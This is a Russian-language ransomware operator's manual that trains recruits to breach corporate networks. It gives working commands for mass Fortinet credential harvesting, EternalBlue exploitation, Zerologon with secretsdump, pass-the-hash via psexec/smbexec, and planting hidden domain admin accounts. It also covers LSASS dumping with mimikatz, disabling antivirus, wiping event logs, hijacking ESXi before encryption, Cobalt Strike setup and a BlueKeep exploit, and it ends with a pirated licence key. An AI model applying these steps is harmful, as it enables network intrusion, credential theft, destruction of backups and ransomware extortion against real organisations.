Вы находитесь на странице: 1из 63

Мануал по работе с сетями

от Bassterlord (FishEye)
Предисловие

Этот мануал рассчитан для новичков в теме.

Но прежде всего на людей которые будут работать на меня.

Вся информация будет изложена в формате методички.

Тут не будет бессмысленных объяснений как работает определенный эксплоит


и гор непонятного кода мы будем применять сразу его на практике.
Как развернуть окружение
Нам понадобится

1. Плеер виртуалка обязательно именно его ТЫЦ

2. VPN ТЫЦ — предпочтительно использовать его на основной машине (не


на виртуалке)

3. Кали линукс торрент ТЫЦ

4. Любая винда 10

5. Nmap ТЫЦ

6. Мимик ТЫЦ

7. GMER ТЫЦ

8. Сканер ТЫЦ — платный использовать только на виртуалке не кидать


на пробитые компы (рядом в архиве будет бесплатный кряк)

9. Pysecdump ТЫЦ

10. Psexec ТЫЦ

11. Фортинет впн ТЫЦ

12. Procdump ТЫЦ

13. PowerTool (будет в архиве рядом с документом)

14. Метасплоит ТЫЦ

15. Блюкип эксплоит для 3389 под виндовс (лежит рядом в архиве)

16. ИМПАКЕТ «https://github.com/SecureAuthCorp/impacket»

17. Зерологон эксплоит (лежит в архиве cve-2020-1472-exploit.py)

18. Fortinet exploit «https://github.com/7Elements/Fortigate»

19. Веракрипт ТЫЦ

20. Аренда сервака 150$ в мес jabber bearhost@thesecure.biz

21. TOX для общения и переписок ТЫЦ


Конечная схема будет выглядеть так
Установка софта в кали

Запускаем виртуалку вводим логин kali пароль kali

Копируем fortinet vpn 123.deb в кали в папку home

Открываем консоль делаем

sudo dpkg -i 123.deb

вводим пароль kali и жмем ентер (пароли в кали не отображаются в


консоли надо вводить в слепую)

Далее вводим

sudo git clone https://github.com/SecureAuthCorp/impacket

cd impacket

sudo python setup.py install

Если потребует пароль вводим kali


Установка софта на виртуалке винды

Устанавливаем все по списку со скрина со всеми настройками по дефолту.

Ставим питон https://www.python.org/downloads/

Копируем папку импакет на диск C:\

Открываем командную строку в виндовс от имени админа

Вводим команды

cd c:\impacket

python setup.py install

в папку impacket копируем зерологон эксплоит на питоне:

cve-2020-1472-exploit.py

Все остальное устанавливаем по дефолту а софты копируем на рабочий


стол.
Сбор материала и как его добывать
Для добычи материала для работы идем на сервис

http://masscan.online/ru

Покупаем аккаунт на ваш выбор и сканируем весь мир на популярные


HTTPS порты пример ниже:

После завершения сканирования скачиваем результаты

Заходим в кали

Открываем консоль пишем

git clone https://github.com/7Elements/Fortigate

cd Fortigate

pip3 install -r requirements.txt

fortigate.py [-h] [-i INPUT] [-o OUTPUT] [-t THREADS] [-c


CREDSCAN]

fortigate.py -i текстовик с нашими айпи -O valid.txt -t


10 -c y

запускаем и ждем валида


По итогу мы получим что-то типа

Это и будет наш материал для работы копируем наш валид на виртуалку с
виндой и смотрим следующий раздел.
RANSOMWARE = Терроризм
Все ваши действия которые вы будете
выполнять далее вы делаете на свой страх и
риск.
Однако данный риск приносит миллионы!
Я не пропагандирую рансом это просто ман по
пентесту.
Начало работы
Первым делом мы заходим в нашу виртуалку под виндовс

Открываем Фортинет впн клиент

Жмем конфигурировать VPN


Далее вводим логин и пароль впна

В случае успешного подключения вы увидите


Далее рекомендую скопировать cmd файл route_print.cmd на
рабочий стол из архива и запустить его

Видим следующую картину и обращаем внимание на интерфейс и


маску сети:

В данном случае мы видим диапазон

10.102.96.0 — 255.255.255.0

это значит что в сканере мы будем прописывать его таким


образом:

10.102.96.0 — 10.102.96.255

Если бы мы видели такую картину:

10.102.0.0 — 255.255.0.0

Тогда в сканере мы будем прописывать

10.102.0.0 — 10.102.255.255
Если мы видим

0.0.0.0 — 0.0.0.0

0.0.0.0 — 0.0.0.0 сверху 2 раза

Значит мы сканим и диапазоны сети как на примере выше если


они есть если их нет и присутствуют двойные строки с нулями
тогда мы берем и сканируем полностью диапазон

192.168.0.0 — 192.168.255.255

Открываем наш сканер Softperfect и вводим полученные


диапазоны.

Делаем CTRL+O откроются настройки сканера все выставляем


как у меня на скринах
Кликнем ОК
Переходим к настройкам аккаунтов

Тут мы впишем логины и пароли от нашего впна

Если вы используете платную версию сканера то у вас будет поле

интеграция с нмап
Ставим галочку на етернал и запускаем сканирование

После завершения сканирования мы будем видеть что-то


подобное:

Наша задача отсортировать результаты по рабочей группе и по


TCP портам. И проверить наличие красных дисков C$ в плюсах
под столбцом IP адрес.
Также не забываем что если у нас платная версия сканера нам
необходимы некоторые альтернативные настройки
Порты и их соответствия с сервисами

Общие:135,137,139,445,8080,80,443

Nas synology port: 5000,5001 - Хранилище данных

Veeam: 9443,9392,9393,9401,6160 - Бекапы

DB mysql,mssql,db2,postgresql: 3306,1433,50000,5432,5433 - Базы


данных

Veritas backup exec. 6101,10000,3527,6106,1125,1434,6102 server


3527,6106 - Бекапы

Oracle: 1521,1522

Remote control: 22,21,3389 4899,5900 - Возможность альтернативного


подключения к компу

Nfs: 111,1039,1047,1048,2049

Iscsi: 860,3260

replication: 902,31031,8123,8043,5480,5722

Sophos Web: 4444

Sophos Console: 2195,8190,8191,8192,8193,8194,49152-65535

В крайней правой колонке в после скана мы будем наблюдать


уязвимые устройства для уязвимости Eternal Blue (MS-17-010)

Далее мы рассмотрим эксплуатацию данной уязвимости


подробно.
MS-17-010 (Eternal Blue)

Для эксплуатации уязвимости на понадобится

Metasploit установленный на виртуальной машине

Открываем консоль CMD в виндовс

Прописываем msfconsole жмем enter и ожидаем загрузки нашего


метасплоита

После загрузки метасплоита вводим поочередно команды:

setg LHOST айпи нашего впна


setg RHOSTS айпи наших уязвимых устройств через запятую
пробел

use exploit/windows/smb/ms17_010_psexec

set payload payload/windows/meterpreter/bind_tcp

exploit

Конечный результат выглядит так:

Жмем ентер и надеемся на успех

В случае успешной эксплуатации вы увидите это:

В случае ошибок ACCESS DENIED

Можно попытаться зашифровать полезную нагрузку от


антивирусов командами указанными ниже:
set EnableStageEncoding true

set StageEncoder x86/shikata_ga_nai

set encoder x86/shikata_ga_nai

set ExitOnSession false

set SessionCommunicationTimeout 0

exploit

Далее ожидаем завершения процесса и смотрим активные сессии


meterpreter-a

Команда sessions выводит список компьютеров по нумерации


который удалось пробить эксплоитом

В нашем случае мы имеем 2 открытые сессии

Перейдем к первой командой sessions 1

Далее введем команды:

getsystem

load kiwi

sysinfo – тут нас интересует находится ли компьютер в домене

В данном случае мы видим что да он находится в домене


Далее вводим команду hashdump

Получаем список хешей пользователей и копируем их в


отдельный текстовик.

Далее вводим creds_all — эта команда попытается вытащить не


зашифрованные пароли из системы
Также копируем их в отдельный текстовый документ

Если у нас несколько сессий в метерпретере тогда вводим


команду bg и повторяем вышеизложенные пункты начиная с
sessions только теперь мы вводим sessions 2 итд. Пока не
пройдемся по всем сессиям.

Далее не закрывая консоль мы идем на сервис

https://www.crackmd5.ru/ и пробуем разшифровать полученные


хеши.

Так как мы уже получили открытые пароли учетных записей из


команды creds_all

Вбиваем их в сканер Настройки => Управление аккаунтами

Вводим учетные записи в формате Домен\логин пароль.

После этого закрываем панель управления аккаунтами выделяем


все айпи адреса и делаем рескан сети:
После открываем все плюсы в столбце IP адрес и смотрим
полученные права.

Нас интересуют красные локальные диски C$

Если красные диски есть везде в домене это означает что мы


получили домен администратора в сети и у нас везде есть права
на чтение и изменение данных на удаленной машине.
Если только на нескольких машинах значит только права
локальных администраторов и стоит искать другие учетные
записи.

Если у нас нет открытых паролей а только хеши которые не


вышло расшифровать мы рассмотрим уязвимости входа по
хешам в разделе PASS THE HASH атак.

Если в открытом компьютере с красным диском C$ нет порта


3389 можно использовать тулзу psexec которую мы рассмотрим в
отдельном разделе.

Если мы пробили через уязвимость сервер - определить его


можно по следующим параметрам и сравнив айпи сессий:

Либо по имени хоста в котором присутствует DC

Например WHDC.domain.local (значения могут быть любыми нам


важно узнать именно DC)

Тогда можно

В сессии сервиса выполнить команды

shell

net group

net group "Domain Admins" /domain

Это поможет узнать нам учетные записи администраторов домена


и соответственно не отвлекается на обычных юзеров и их
аккаунты.

Нам ведь важен уровень «БОГ» да?)


Zerologon
Для эксплуатации уязвимости нам необходимо просканировать сеть и
определить DC – Домен контроллер

Как его определить описано на странице 28 выше

Нам необходимо быть подключенным к сети на которой мы производим


эксплуатацию а также иметь установленный на виндовс Python

Также Impacket распакованный по пути C:\impacket с уже лежащим в нем


эксплоитом cve-2020-1472-exploit.py

Также на рабочий стол поместить .cmd файл с таким содержанием

Мы будем его переписывать и запускать на необходимые нам цели в сети.


Делаем сортировку по аккаунтам пользователей и подставляем нужные
нам значения до первой точки как на скриншоте ниже

Сохраняем файл Zerologon.cmd и запускаем его далее все зависит от того


запатчен ли сервер от данной уязвимости или нет.

Повторяем это действие на всех DC по очереди пока не получим


положительный результат:
Если строка Performing authentication attempts идет более 4 минут или
выдает нам отрицательный результат переходим к следующему DC или
используем другие уязвимости если все DC не подвержены уязвимости.

Иногда DC никак не выдают себя и необходимо просканировать данным


эксплоитом все машины в домене (рабочей группе) но это дает свои плоды.

После успешной эксплуатации идем в наш кали

Подключаемся к впну компании


Открываем консоль и вводим следующее

cd impacket/examples

sudo python3 secretsdump.py -no-pass -just-dc AGLEADER/ag40server\$@192.168.16.27

Жмем enter нас попросит ввести пароль вводим в слепую kali и жмем enter

(помним, что в кали не отображается вводимый пароль по этому в слепую)

У нас должен пойти процесс извлечение учеток и хешей

После окончания копируем все, что выдаст нам консоль


Далее идем на сервис https://www.crackmd5.ru/

Пробуем расшифровать хеш администратора (выделен желтым цветом)


Administrator:500:aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee:::

В случае если мы разшифруем пароль смело ломимся во все компы с


даннымы кредами не забывая подставить рабочую группу пример:

AGLEADER\Administrator и наш пароль.

Если мы не получаем пароль нам необходимо использовать Pass The Hash


атаку.
Pass The Hash
Итак у нас есть хеши но пароль от учетки админа мы не смогли получить.

Возвращаемся в кали.

Если закрыли консоль открываем снова

вводим cd impacket/examples
sudo python3 smbexec.py -hashes
aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee
Administrator@192.168.16.27

либо

sudo python3 psexec.py -hashes


aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee
Administrator@192.168.16.27

Данные подставляем свои полученные из эксплуатации Zerologon

После выполнения мы получим CMD на удаленной машине DC – C:\Windows\system32>

Далее вводим следующие команды

net user support Pa$$wo0rd /add

net user support /active:yes

net localgroup Administrators support /add

Если ломимся по «Громкому» можем создать сразу своего домен админа

net group "Domain Admins" support /add

После этого мы получаем свою учетную запись с правами домен администратора а


соответственно можем вломится во все машины на домене по учетной записи:

support Pa$$wo0rd

Далее заходим DC и снимаем креды домен админов мимиком 64.exe или 32.exe

Команды для мимика по очереди:

privilege::debug - log 1234.txt - sekurlsa::logonPasswords full


Обходы АВ
Мы подключились к компу первым делом смотрим трей возле часов и
отображающиеся там значки и ищем ав.

Если на компе установлен простой виндовс дефендер заходим в настройки


и добавляем в исключения диск C:\
Обычно антивирусы без пароля можно тупо деинсталировать через мастер
удаления программ в виндовс.

Важно если мы видим установленные ав Sophos (синего цвета) или Sentinel

на всех машинах дальнейшая работа с данной компанией будет


бессмысленна.

Другие же антивирусные решения можно спокойно убить через 2 тулзы:

Gmer

PowerTool

Если ав убить не получается открываем реестр виндовс

переходим по пути:

Компьютер\HKEY_LOCAL_MACHINE\SOFTWARE

и ищем папки с названиями АВ

Если находим смотрим все подпапки которые есть в папке с ав наша цель
найти папки и значения внутри них с названием Exclusions (исключения)

Предположим мы нашли значение исключений допустим

С:\users\admin\java.exe

Переименовываем наш мимик или вредонос в java.exe и кидаем по


данному пути если такого пути или папок нет на этой машине создаем
папки 1 в 1 как указано в исключениях и пробуем запустить наш файл.

В большинстве случаев ав их не видит если он не слишком умный )

Если у нас не выходит ничего из вышеперечисленного топаем на все


машины в домене по порту 3389 из сканера и смотрим установлен ли ав
там.
Если ав не установлен на нескольких машинах можно закинуть туда
портативный софтперфект сканер просканить сеть изнутри смонтировать
диски и запустить наш кх*кер извините подавился =D

В идеале нужно убить ав везде где можно и добавить в исключения диски


C:\

А компы на которых нет порта 3389 в том числе и NAS хранилища


смонтировать и уже потом начинать лкх..к да что-ж такое =D
NAS и бекапы
Самая сложная часть )

Итак доступ к домен админу мы получили

Делаем скан сети изнутри

Смотрим все порты

Обычно нас хранилища висят на портах

5000,5001

а бекапы

Veeam: 9443,9392,9393,9401,6160

Veritas backup exec. 6101,10000,3527,6106,1125,1434,6102 server 3527,6106

либо они будут подписаны в имени хоста как NAS

Обычно насы висят вне домена первым делом смотрим скан если у нас
появился доступ к ним из обычного скана с учетками домен админа все
супер.
Однако если насы в воркгруппе можно пробить всех домен админов и
попробовать залогинится в них по кредам без домена с пробитых учеток
через веб интерефейс открыв айпи наса через браузер и указав порт наса
через двоеточие.

В 40 % случаев креды домен админов должны подходить.

Если не подходят берем учетку Administator и ее пароль.

Логинимся в нас как Admin с тем же паролем либо перебираем пароли от


других домен админов вероятность пробива повышается.

Иногда при сканировании насов через Softperfect отображаются учетные


записи которые активны в хранилище обычно это:

Admin, backup, Sysadm и прочее.

Если мы открыли сеть через PASS THE HASH ищем в результатах


полученых хешей эти учетки и достаем от них пароли через сервис взлома
хешей.

С вимами и прочими бекапами таже тема.

И самое важно на этапе Кх..ка нам необходимо начинать с дисков и компов


где больше всего памяти в от 500 гигов и больше

Соответственно самым важным и первым будет идеально зафигачить


«большие данные»
VС и ESXI
Данный раздел за меня проведет великий и
ужасный:

Борис Николаевич Ельцин


Aka. https://xss.is/members/204378/
Фишка в том, что тебе ав не нужно обходить.
Для начала нужно получить креды от вицентра

В 60 процентах она в домене и по кредам ДА пускает

В остальных случиях кейлогер

В своей работе я часто сталкиваюсь с задачей сброса root пароля на esx.

Представим ситуацию у нас есть креды администратора vcenter есть домен


админ и вся сеть готова к л**у, но никак не удалоcь поймать пароль под
esx, вот один из способов.

Без перезагрузки без лишнего палева

НО Я НАСТОЯТЕЛЬНО РЕКОМЕНДУЮ РЕСАТЬ ПАСС В НОЧЬ ПЕРЕД


НАКРЫВОМ СЕТИ

Т.е вы сбрасываете пароль и сразу шифруете.

Этот способ заключается в том что мы введем esx в домен и сможем


авторизоваться по кредам доменного админа

Идем на DC, открываем Active Directory Users and computers

И создаем там глобальную группу ESX Admins обязательно включаем туда


своего доменного админа.

далее возвращаемся в vcenter

Выбираем esx хост нажимаем configure - Autentication Service - Join domain


вводим домне в формате domain.local или domain.com какой домен можно
узнать введя systeminfo на компе в домене

вводим логин домен админа без домена и его пароль. теперь все готово для
авторизации, заходим в esx хост используя креды доменного админа и
сбрасываем root пасс

Потом просто по ssh заходишь на esx

Выключаешь машины

И делаешь грязные дела =)


PSEXEC
В этом разделе мы рассмотрим тулзу Psexec и чем она будет полезна на
практике.

Первым делом она поможет нам запустить любой файл на всех тачках к
которым у нас есть доступ.

Предположим у нас есть exe файл который нам нужно запустить

Открываем CMD перетаскиваем туда psexec.exe

и далее пишем следующее

Если вы удалили все ав добавили исключения и сделали все как нужно


данный exe будет запущен на всех компах.

Если вам нужно запустить файл от имени системы добавляем к


параметрам -s -d -c файл.exe

Через Psexec можно получить и снять креды с удаленных компов если на


них нет 3389 порта но учетка у нас есть.

Через сканер открываем папку C$ закидываем туда pysecdump.exe

и procdump.exe
Итак мы вошли в тачку делаем

cd C:\

pysecdump.exe -s

Эта команда выдаст нам хеши админа на удаленном компе пытаемся


поломать через сайт или используем PASS THE HASH в кали на других
тачках.

Далее делаем

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\


WDigest /v UseLogonCredential /t REG_DWORD /d 1

procdump.exe --accepteula -ma lsass.exe lsass.dmp

В случае успеха на удаленной тачке на диске C:\ будет создан lsass.dmp


файл.

Копируем его на свой комп рядом с mimikatz.exe

Открываем мимик и делаем в нем:

sekurlsa::minidump lsass.dmp

privilege::debug

log 1234.txt

sekurlsa::logonPasswords full

Он также выдаст нам креды или хеши.

Далее можно попробовать удаленно включить рдп порт командой

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\


Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Не всегда срабатывает!

После выполнения команды можно будет подрубится к РДП

Не забываем после всего удалить все файлы и следы работы на удаленной


тачке.
После всех действий если желаете минимально затереть следы своего
пребывания и отложить взлом.

На машинах в которые вы заходили по рдп можно открыть павершелл

и прописать следующее:

wevtutil el | Foreach-Object {wevtutil cl "$_"}

Эта регулярка сотрет все журналы.

Также команды на удаление скрытых учеток cmd

net user support Pa$$wo0rd /delete

net group "Domain Admins" support /delete


Cobalt Strike
О том как я вижу все ПП

Проще говоря выше описаные мной методы


полностью нахрен исключают кобу ну если народ
просит почему бы и нет?
Короче арендуем сервак на линукс
закидываем туда кобу
делаем в консоли
cd cs4.0
java -XX:ParallelGCThreads=4 -
Dcobaltstrike.server_port=50050 -
Djavax.net.ssl.keyStore=./cobaltstrike.store -
Djavax.net.ssl.keyStorePassword=123456 -server -XX:
+AggressiveHeap -XX:+UseParallelGC -
javaagent:Hook.jar -classpath ./cobaltstrike.jar
server.TeamServer АЙПИ СЕРВАКА 12345
Переходим на свою тачку я работаю с винды в кобе
для этого надо предварительно установить яву.
Запускаем cobaltstrike.bat

Вводим айпи нашего арендованного хоста учетку и


пароль который указан в конфиге выше.
Идем в раздел.

Создаем прослушиватель.

Далее создаем пейлоад.


После нажатия кнопки Generete у нас будет
екзешник пихаем его на дц и запускаем там же.
Далее делаем

Там же делаем
Дальше идем в

Выделяем все тачки в сети и пытаемся ломится в


них по хешу админа.
Стоит упомянуть, что не всегда тачки выходят в
общий инет.
Тогда делаем

Мы превращаем зараженный комп в локальный


прослушиватель на который будут стучать все
тачки на районе =D
Про остальной функционал расписывать нет
смысла так как по мне коба подходит только для
удобного снятия кредов и поиска кредов от насов.
А так это просто гуано летучей мыши которое
палится как новогодняя елка всем чем можно а
крипт на это гумно стоит ебических денег и ты еще
прогера найди который пейлоад перепишет ага.
BLUEKEEP
Я жертвую вам в дар самописный эксплоит для 3389

Все что нужно сделать это добавить айпи с 3389


в столбик без портов и запустить run.bat
Если открыть run.bat через текстовик мы увидим
креды скрытой учетки которая будет создаваться на
пробитых экспом компах.
Гуды будут сохранены в отдельный текстовик.
Эксп сначала пытается перевести удаленные тачки
в синий экран и ждет их перезагрузки.
После перезагрузки он автоматически исполняет
пейлоад и мы получаем скрытую учетку с правами
админа на уязвимом компе.
Этот эксп необходимо перезапускать 2-3 раза он не
всегда срабатывает как нужно это связано с
таймингами перезапуска на удаленных тачках.
Ну а теперь после того как мы похоронили селлеров
рдп доступов можно переходить к заключению
Тут собраны знания которые помогут вам
заработать так или иначе это все, что я знал.
Источник иллюстраций к данному мануалу взят из
манхвы Fish Eye Placebo
https://www.yuumeiart.com/
Я не спорю что есть люди умнее меня и с куда белее
обширным багажом знаний но как по мне этого
хватит для пентеста любой сети будь то цитрикс,
циско, пало альто, фортики, пульсы.

Бонус лицуха на софтперфект до 2022


dUYiN30Q4+ydHwgPCwku3K+FYDomodEqW0bRGcTyxvdnlc7g4nne7cfwXOGPJbBVdPeqEs7jzX2yDiVxxiiNaCvNK4T7ML0Qfarren5vr
MZEBcoOivf7QQ05BPxSG370cIus/AZxAuRAcibpckx1Ie+R4UTNiyBh6ZVcIwii+8M1lnRp+lcRmFqbgLGZ/
cbzzh09IfaFKwoGJRPcTcnizxQtBJSk9sqlbNc6SwWeiQgl+0J+A1mrkrG3zd03vSjBUbc8daN08ebjOGYDsZVptkkhe5ASAJt/
Uwzs0QCqO2issqS+QpE/atLV3lR63k/
2G1y6yECKu7w+s1SV9aEKsxKhuBJplKLhbGoQIX7hGxDwww1HFLGqCZbAce1mz7aP6xqqltEgoM2oVvKv02tVUoLGYSHYtAGGoaksl
XXu4+MLs26nLUoltIfIcOC1dOQsjChjXil8Im+dDOY+V1m5M0e2GckmBjTX4blWbz+hOmjl23n6f0jSndxT70Dd3Jl9